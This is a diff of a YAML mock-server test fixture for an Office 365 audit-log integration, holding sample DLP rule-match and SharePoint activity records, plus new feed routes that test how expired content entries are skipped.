"50842eb7-edc8-4019-85dd-5a5c1f2bb085"}, {"Count": 2, "Confidence": 85, "SensitiveType": "0e9b3178-9678-47dd-a509-37222ca96b42"}]}, "ActionParameters": ["GenerateAlert:asr@testsiem2.onmicrosoft.com"], "RuleMode": "Enable"}], "PolicyName": "Financial Data Detection", "PolicyId": "08745d02-5d45-48bd-98e1-8199ab1efdbe"}], "SharePointMetaData": {"From": "alice@testsiem2.onmicrosoft.com", "UniqueID": "3ace820e-9358-4520-9df6-5bd65602cef0", "FilePathUrl": "https://testsiem2.sharepoint.com/sites/Internalcommunications/Shared%20Documents/Document.docx", "ItemLastModifiedTime": "2020-02-26T09:56:12", "SiteCollectionUrl": "https://testsiem2.sharepoint.com/sites/Internalcommunications", "ItemCreationTime": "2020-02-26T09:55:38", 
"SiteCollectionGuid": "4aaa3319-df17-4ea0-a142-42cf204cfc62", "FileSize": 35920, "IsViewableByExternalUsers": false, "FileOwner": "alice@testsiem2.onmicrosoft.com", "FileName": "Document.docx"}, "UserKey": "DLPAgent", "Operation": "DLPRuleMatch", "IncidentId": "0ae82be2-e321-ab52-d000-08d7bab8fe55", "Id": "93585ace-96eb-4af1-fdb2-08d7bab8f2bd", "RecordType": 11}, - {"Workload": "SharePoint", "SensitiveInfoDetectionIsIncluded": false, "OrganizationId": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", "UserId": "DLPAgent", "CreationTime": "2020-02-26T12:39:40", "UserType": 4, "Version": 1, "PolicyDetails": [{"Rules": [{"Severity": "High", "RuleId": "121c85c3-b2b2-4d5b-af11-b1d1bc0b36fd", "ConditionsMatched": {"SensitiveInformation": [{"Count": 42, "Confidence": 85, "SensitiveType": "50842eb7-edc8-4019-85dd-5a5c1f2bb085"}, {"Count": 2, "Confidence": 85, "SensitiveType": "0e9b3178-9678-47dd-a509-37222ca96b42"}]}, "Actions": ["NotifyUser", "GenerateAlert"], "RuleName": "Low volume of content detected France Financial", "ActionParameters": ["GenerateAlert:asr@testsiem2.onmicrosoft.com"], "RuleMode": "Enable"}], "PolicyName": "Financial Data Detection", "PolicyId": "08745d02-5d45-48bd-98e1-8199ab1efdbe"}], "SharePointMetaData": {"From": "alice@testsiem2.onmicrosoft.com", "IsViewableByExternalUsers": false, "FilePathUrl": "https://testsiem2.sharepoint.com/sites/Internalcommunications/Shared%20Documents/Document.docx", "ItemLastModifiedTime": "2020-02-26T09:56:12", "SiteCollectionUrl": "https://testsiem2.sharepoint.com/sites/Internalcommunications", "ItemCreationTime": "2020-02-26T09:55:38", "FileName": "Document.docx", "SiteCollectionGuid": "4aaa3319-df17-4ea0-a142-42cf204cfc62", "FileSize": 35920, "UniqueID": "3ace820e-9358-4520-9df6-5bd65602cef0", "FileOwner": "alice@testsiem2.onmicrosoft.com"}, "UserKey": "DLPAgent", "Operation": "DLPRuleMatch", "IncidentId": "0ae82be2-e321-ab52-d000-08d7bab8fe55", "Id": "93585ace-96eb-4af1-fdb2-08d7bab8f2bd", "RecordType": 11}, - 
{"Workload":"Exchange","SensitiveInfoDetectionIsIncluded":false,"ObjectId":"","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","CreationTime":"2020-02-24T20:11:15","UserId":"DlpAgent","UserType":4,"Version":1,"PolicyDetails":[{"Rules":[{"Severity":"High","RuleId":"51e3d97a-e159-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"High volume of content detected test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"},{"Severity":"Medium","RuleId":"51e3d97a-1234-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"Mid volume of content detected test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"}],"PolicyName":"test","PolicyId":"88956b36-45b3-4828-bf53-78603c0e5f58"}],"ExchangeMetaData":{"From":"asr@testsiem2.onmicrosoft.com","CC":["asr@example.net"],"BCC":[],"To":["asr@example.org"],"FileSize":13405,"UniqueID":"8e103f2f-b293-4062-38b8-08d7b965b2fa","MessageID":"","RecipientCount":2,"Sent":"2020-02-24T20:11:14","Subject":"Here's the phony 
data"},"UserKey":"1153801116545789462","Operation":"DlpRuleMatch","IncidentId":"c1dc582b-fa61-6020-1800-08d7b966ec64","Id":"d5a0e7d9-e06f-498c-8413-eb83b7dbd516","RecordType":13}, - {"Workload":"Exchange","SensitiveInfoDetectionIsIncluded":false,"ObjectId":"","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","CreationTime":"2020-02-24T20:11:15","UserId":"DlpAgent","UserType":4,"Version":1,"PolicyDetails":[{"Rules":[{"Severity":"High","RuleId":"51e3d97a-e159-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"High volume of content detected test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"},{"Severity":"Medium","RuleId":"51e3d97a-1234-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"Mid volume of content detected 
test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"}],"PolicyName":"test","PolicyId":"88956b36-45b3-4828-bf53-78603c0e5f58"}],"ExchangeMetaData":{"From":"asr@testsiem2.onmicrosoft.com","CC":["asr@example.net"],"BCC":[],"To":["asr@example.org"],"FileSize":13405,"UniqueID":"8e103f2f-b293-4062-38b8-08d7b965b2fa","MessageID":"","RecipientCount":2,"Sent":"2020-02-24T20:11:14","Subject":"Here's the phony data"},"UserKey":"1153801116545789462","Operation":"DlpRuleUndo","IncidentId":"c1dc582b-fa61-6020-1800-08d7b966ec64","Id":"d5a0e7d9-e06f-498c-8413-eb83b7dbd516","RecordType":13}, - {"Workload":"Exchange","SensitiveInfoDetectionIsIncluded":false,"ObjectId":"","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","CreationTime":"2020-02-24T20:11:15","UserId":"DlpAgent","UserType":4,"Version":1,"ExceptionInfo":"{ \"Justification\": \"I really need to share those files\" }","PolicyDetails":[{"Rules":[{"Severity":"High","RuleId":"51e3d97a-e159-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"High volume of content detected test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"},{"Severity":"Medium","RuleId":"51e3d97a-1234-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message 
Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"Mid volume of content detected test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"}],"PolicyName":"test","PolicyId":"88956b36-45b3-4828-bf53-78603c0e5f58"}],"ExchangeMetaData":{"From":"asr@testsiem2.onmicrosoft.com","CC":["asr@example.net"],"BCC":[],"To":["asr@example.org"],"FileSize":13405,"UniqueID":"8e103f2f-b293-4062-38b8-08d7b965b2fa","MessageID":"","RecipientCount":2,"Sent":"2020-02-24T20:11:14","Subject":"Here's the phony data"},"UserKey":"1153801116545789462","Operation":"DlpRuleMatch","IncidentId":"c1dc582b-fa61-6020-1800-08d7b966ec64","Id":"d5a0e7d9-e06f-498c-8413-eb83b7dbd516","RecordType":13}, - {"Workload":"Exchange","SensitiveInfoDetectionIsIncluded":false,"ObjectId":"","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","CreationTime":"2020-02-24T20:11:15","UserId":"DlpAgent","UserType":4,"Version":1,"ExceptionInfo":{ "FalsePositive": true },"PolicyDetails":[{"Rules":[{"Severity":"High","RuleId":"51e3d97a-e159-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"High volume of content detected test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"},{"Severity":"Medium","RuleId":"51e3d97a-1234-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message 
Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"Mid volume of content detected test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"}],"PolicyName":"test","PolicyId":"88956b36-45b3-4828-bf53-78603c0e5f58"}],"ExchangeMetaData":{"From":"asr@testsiem2.onmicrosoft.com","CC":["asr@example.net"],"BCC":[],"To":["asr@example.org"],"FileSize":13405,"UniqueID":"8e103f2f-b293-4062-38b8-08d7b965b2fa","MessageID":"","RecipientCount":2,"Sent":"2020-02-24T20:11:14","Subject":"Here's the phony data"},"UserKey":"1153801116545789462","Operation":"DlpRuleMatch","IncidentId":"c1dc582b-fa61-6020-1800-08d7b966ec64","Id":"d5a0e7d9-e06f-498c-8413-eb83b7dbd516","RecordType":13}, - {"Workload":"Exchange","SensitiveInfoDetectionIsIncluded":false,"ObjectId":"","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","UserId":"DlpAgent","CreationTime":"2020-02-24T20:11:15","UserType":4,"Version":1,"PolicyDetails":[{"Rules":[{"Severity":"Low","RuleId":"8398c03a-a00d-42bb-8f80-ead0ad04e1df","RuleName":"Low volume of content detected test","Actions":["NotifyUser"],"ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message 
Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"RuleMode":"Enable"}],"PolicyName":"test","PolicyId":"88956b36-45b3-4828-bf53-78603c0e5f58"}],"ExchangeMetaData":{"From":"asr@testsiem2.onmicrosoft.com","CC":["asr@example.net"],"BCC":[],"To":["asr@example.org"],"FileSize":13310,"UniqueID":"8e103f2f-b293-4062-38b8-08d7b965b2fa","MessageID":"","RecipientCount":2,"Sent":"2020-02-24T20:11:14","Subject":"Here's the phony data"},"UserKey":"1153801116545789462","Operation":"DlpRuleMatch","IncidentId":"c1dc582b-fa61-6020-1800-08d7b966ec64","Id":"a42123a9-1c07-4dde-9be6-ac71cb9fd16b","RecordType":13}, - {"Workload":"Exchange","SensitiveInfoDetectionIsIncluded":false,"ObjectId":"","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","UserId":"DlpAgent","CreationTime":"2020-02-24T20:11:15","UserType":4,"Version":1,"PolicyDetails":[{"Rules":[{"Severity":"Low","RuleId":"8398c03a-a00d-42bb-8f80-ead0ad04e1df","RuleName":"Low volume of content detected test","Actions":["NotifyUser"],"ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"RuleMode":"Enable"}],"PolicyName":"test","PolicyId":"88956b36-45b3-4828-bf53-78603c0e5f58"}],"SharePointMetaData":{"From":"alice@testsiem2.onmicrosoft.com","itemCreationTime":"2020-02-20T11:23:45","UniqueID":"8e103f2f-b293-4062-38b8-08d7b965b2fa","FileName":"Company-Internal-Financial.docx","FileOwner":"alice@testsiem2.onmicrosoft.com","FilePathUrl":"https://example.net/testsiem2.onmicrosoft.com/sharepoint","LastModifiedTime":"2020-02-24T12:13:14Z"},"UserKey":"1153801116545789462","Operation":"DlpRuleMatch","IncidentId":"c1dc582b-fa61-6020-1800-08d7b966ec64","Id":"a42123a9-1c07-4dde-9be6-ac71cb9fd16b","RecordType":13} - 
] # CEL Input Rules - path: /test-cel-tenant-id/oauth2/v2.0/token methods: [POST] @@ -322,7 +101,7 @@ rules: Content-Type: - "application/json" body: |- - [{"contentType": "Audit.Sharepoint","contentId": "celid2","contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/celsp1/activity/feed/audit/celid2","contentCreated": "{{ .request.vars.endTime }}","contentExpiration": "2199-05-30T17:35:00.000Z"}] + [{"contentType": "Audit.Sharepoint","contentId": "celid2","contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/celsp1/activity/feed/audit/celid2","contentCreated": "{{ .request.vars.endTime }}","contentExpiration": "2199-05-30T17:35:00.000Z"},{"contentType": "Audit.Sharepoint","contentId": "celid2a","contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/celsp1/activity/feed/audit/celid2a","contentCreated": "{{ .request.vars.endTime }}","contentExpiration": "2023-03-30T17:35:00.000Z"},{"contentType": "Audit.Sharepoint","contentId": "celid2b","contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/celsp1/activity/feed/audit/celid2b","contentCreated": "{{ .request.vars.endTime }}","contentExpiration": "2055-04-30T17:35:00.000Z"}] - path: /api/v1.0/celsp1/activity/feed/audit/celid1 methods: [GET] request_headers: 
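Review bot: The added `celid2a` and `celid2b` entries in the subscriptions body encode the expiry behaviour under test (one `contentExpiration` already in the past, one in 2055) but nothing on that line says which entries are expected to be fetched, so the intent is only recoverable from the comment on the `celid2a` route further down in the file. A short comment above the `body: |-` line, e.g. `# celid2a has contentExpiration in the past and should be skipped; celid2 and celid2b are still valid`, would keep that contract next to the data it describes. The 2055 date also makes the fixture wall-clock dependent; if the expiry comparison is against the current time, as the later route comment suggests, the far-future dates are fine but worth stating explicitly so the cut-over is not silent when it eventually arrives.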
@@ -333,6 +112,7 @@ rules: headers: Content-Type: - "application/json" + # 4 documents, but only 2 unique Ids body: |- [{"ListItemUniqueId":"59a8433d-9bb8-cfef-6edc-4c0fc8b86875","ItemType":"Page","Workload":"OneDrive","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-07T16:43:53","Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ClientIP":"213.97.47.133","WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserType":0,"Version":1,"EventSource":"SharePoint","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0","UserKey":"i:0h.f|membership|1003200096971f55@live.com","CustomUniqueId":true,"Operation":"PageViewed","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx","Id":"99d005e6-a4c6-46fd-117c-08d7abeceab5","CorrelationId":"622b339f-4000-a000-f25f-92b3478c7a25","RecordType":4},{"UserId":"asr@testsiem.onmicrosoft.com","ListItemUniqueId":"59a8433d-9bb8-cfef-6edc-4c0fc8b86875","RecordType":4,"ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx","Workload":"OneDrive","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserType":0,"CreationTime":"2020-02-07T16:43:53","Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ClientIP":"213.97.47.133","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0","Version":1,"EventSource":"SharePoint","CustomUniqueId":true,"UserKey":"i:0h.f|membership|1003200096971f55@live.com","Operation":"PageViewed","Id":"99d005e6-a4c6-46fd-117c-08d7abeceab5","CorrelationId":"622b339f-4000-a000-f25f-92b3478c7a25","ItemType":"Page"},{"Workload":"OneDrive","Version":1,"RecordType":4,"ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-07T16:43:53","Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","Id":"99d005e6-a4c6-46fd-117c-08d7abeceab5","WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserType":0,"ListItemUniqueId":"59a8433d-9bb8-cfef-6edc-4c0fc8b86875","EventSource":"SharePoint","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0","UserKey":"i:0h.f|membership|1003200096971f55@live.com","CustomUniqueId":true,"ClientIP":"213.97.47.133","Operation":"PageViewed","CorrelationId":"622b339f-4000-a000-f25f-92b3478c7a25","ItemType":"Page"},{"SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","CreationTime":"2020-02-07T16:44:23","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","Version":1,"SourceRelativeUrl":"Documents","RecordType":6,"UserId":"asr@testsiem.onmicrosoft.com","SourceFileExtension":"png","UserType":0,"EventSource":"SharePoint","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ClientIP":"213.97.47.133","CorrelationId":"692b339f-902e-a000-f25f-95def5f17903","Workload":"OneDrive","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","SourceFileName":"Screenshot.png","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0","ItemType":"File","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","Operation":"FileModified","Id":"5b02fadb-8eac-4aff-af87-08d7abecfca3"}] - path: /api/v1.0/celsp1/activity/feed/audit/celid2 
@@ -345,8 +125,35 @@ rules: headers: Content-Type: - "application/json" + # 2 documents body: |- [{"SourceRelativeUrl":"Documents","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","CreationTime":"2020-02-07T16:44:07","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","Version":1,"RecordType":6,"UserId":"asr@testsiem.onmicrosoft.com","SourceFileExtension":"png","UserType":0,"EventSource":"SharePoint","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0","ClientIP":"213.97.47.133","CorrelationId":"652b339f-908c-a000-f25f-91423da7dd9b","Workload":"OneDrive","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png","WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/","SourceFileName":"Screenshot 2020-01-27 at 11.30.48.png","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","ListItemUniqueId":"4803608a-df7d-4f63-aa73-67aa33bb576e","Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","Operation":"FileDeleted","Id":"ec04aa09-0a43-4879-cdc8-08d7abecf327"},{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ItemType":"File","UserKey":"i:0h.f|membership|1003200096971f55@live.com","TargetUserOrGroupName":"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"System.LimitedEdit","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 
Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SourceFileName":"Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"79.159.10.151","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SecurityGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"98633e47-3540-4e8a-bcfc-08d7b17b4e48","UserType":0}] + # contentExpiration < now. This shouldn't run. + - path: /api/v1.0/celsp1/activity/feed/audit/celid2a + methods: [GET] + request_headers: + Authorization: + - "Bearer CELtoken" + responses: + - status_code: 200 + headers: + Content-Type: + - "application/json" + body: |- + [{"SourceRelativeUrl":"Documents","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","CreationTime":"2020-02-07T16:44:07","ListId":"2b6ad2be-0ed7-4556-9c89-a97847085b85","Version":1,"RecordType":6,"UserId":"asr@testsiem.onmicrosoft.com","SourceFileExtension":"png","UserType":0,"EventSource":"SharePoint","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0","ClientIP":"213.97.47.133","CorrelationId":"652b339f-908c-a000-f25f-91423da7dd9b","Workload":"OneDrive","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 12.30.48.png","WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/","SourceFileName":"Screenshot 2020-01-27 at 
112.30.48.png","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","ListItemUniqueId":"4803608a-df7d-4f63-aa73-67aa33bb576e","Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","Operation":"FileDeleted","Id":"dc04aa19-0b43-4879-cdc8-08d7abecf327"},{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ItemType":"File","UserKey":"i:0h.f|membership|1003200096971f55@live.com","TargetUserOrGroupName":"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"System.LimitedEdit","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot1234.png","SourceFileName":"Screenshot1234.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"79.159.10.151","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot1234.png","EventSource":"SharePoint","TargetUserOrGroupType":"SecurityGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"90633f47-2540-4e8a-bcfc-08d7b17b4e48","UserType":0}] + - path: /api/v1.0/celsp1/activity/feed/audit/celid2b + methods: [GET] + request_headers: + Authorization: + - "Bearer CELtoken" + responses: + - status_code: 200 + headers: + Content-Type: + - "application/json" + # 2 documents + body: |- + 
[{"SourceRelativeUrl":"Documents","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","CreationTime":"2020-02-07T16:44:07","ListId":"2b6ad2be-0ed7-4556-9c89-a97847085b85","Version":1,"RecordType":6,"UserId":"asr@testsiem.onmicrosoft.com","SourceFileExtension":"png","UserType":0,"EventSource":"SharePoint","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0","ClientIP":"213.97.47.133","CorrelationId":"652b339f-908c-a000-f25f-91423da7dd9b","Workload":"OneDrive","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 12.30.48.png","WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/","SourceFileName":"Screenshot 2020-01-27 at 112.30.48.png","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","ListItemUniqueId":"4803608a-df7d-4f63-aa73-67aa33bb576e","Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","Operation":"FileDeleted","Id":"dc04ab19-0b43-4g79-cdc8-08d7abecf317"},{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ItemType":"File","UserKey":"i:0h.f|membership|1003200096971f55@live.com","TargetUserOrGroupName":"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"System.LimitedEdit","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 
